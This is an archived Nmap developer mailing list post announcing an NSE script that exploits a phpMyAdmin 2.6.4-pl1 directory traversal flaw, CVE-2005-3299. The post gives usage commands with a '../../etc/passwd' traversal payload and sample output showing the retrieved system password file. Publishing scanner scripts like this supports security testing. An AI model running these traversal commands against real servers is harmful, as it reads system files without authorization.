Nmap Development mailing list archives

[NSE] http-phpmyadmin-dir-traversal

From: Meshcheryakov Alexey <tank1st99 () gmail com>
Date: Wed, 20 Mar 2013 14:12:40 +0400

Hi nmap-deev,
attached is a script, which exploit a directory traversal
vulnerability in phpMyAdmin 2.6.4-pl1. I wrote this script for
training purpose. Maybe it will be usefull for someone.
-- @usage
-- nmap -p80 --script http-phpmyadmin-dir-traversal
--script-args="dir='/pma/',file='../../../../../../../../etc/passwd',outfile='passwd.txt'"
<host/ip>
-- nmap -p80 --script http-phpmyadmin-dir-traversal <host/ip>
--
-- @args http-phpmyadmin-dir-traversal.file Remote file to retrieve.
Default: <code>../../../../../etc/passwd</code>
-- @args http-phpmyadmin-dir-traversal.outfile Output file
-- @args http-phpmyadmin-dir-traversal.dir Basepath to the services
page. Default: <code>/phpMyAdmin-2.6.4-pl1/</code>
---
-- @output
-- PORT   STATE SERVICE
-- 80/tcp open  http
-- | http-phpmyadmin-dir-traversal:
-- |   VULNERABLE:
-- |   phpMyAdmin grab_globals.lib.php subform Parameter Traversal
Local File Inclusion
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2005-3299
-- |     Description:
-- |       PHP file inclusion vulnerability in grab_globals.lib.php in
phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include
local files via the $__redirect parameter, possibly involving the
subform array.
-- |
-- |     Disclosure date: 2005-10-nil
-- |     Extra information:
-- |       ../../../../../../../../etc/passwd :
-- |   root:x:0:0:root:/root:/bin/bash
-- |   daemon:x:1:1:daemon:/usr/sbin:/bin/sh
-- |   bin:x:2:2:bin:/bin:/bin/sh
-- |   sys:x:3:3:sys:/dev:/bin/sh
-- |   sync:x:4:65534:sync:/bin:/bin/sync
-- |   games:x:5:60:games:/usr/games:/bin/sh
-- |   man:x:6:12:man:/var/cache/man:/bin/sh
-- |   lp:x:7:7:lp:/var/spool/lpd:/bin/sh
-- |   mail:x:8:8:mail:/var/mail:/bin/sh
-- |   news:x:9:9:news:/var/spool/news:/bin/sh
-- |   uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
-- |   proxy:x:13:13:proxy:/bin:/bin/sh
-- |   www-data:x:33:33:www-data:/var/www:/bin/sh
-- |   backup:x:34:34:backup:/var/backups:/bin/sh
-- |   list:x:38:38:Mailing List Manager:/var/list:/bin/sh
-- |   irc:x:39:39:ircd:/var/run/ircd:/bin/sh
-- |   gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
-- |   nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
-- |   libuuid:x:100:101::/var/lib/libuuid:/bin/sh
-- |   syslog:x:101:103::/home/syslog:/bin/false
-- |   sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
-- |   dps:x:1000:1000:dps,,,:/home/dps:/bin/bash
-- |   vboxadd:x:999:1::/var/run/vboxadd:/bin/false
-- |   mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false
-- |   memcache:x:104:112:Memcached,,,:/nonexistent:/bin/false
-- |   ../../../../../../../../etc/passwd saved to passwd.txt
-- |
-- |     References:
-- |       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
-- |_      http://www.exploit-db.com/exploits/1244/

Regards, Alexey Meshcheryakov

Attachment: http-phpmyadmin-dir-traversal.nse
Description:

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/

Current thread:

[NSE] http-phpmyadmin-dir-traversal Meshcheryakov Alexey (Mar 20)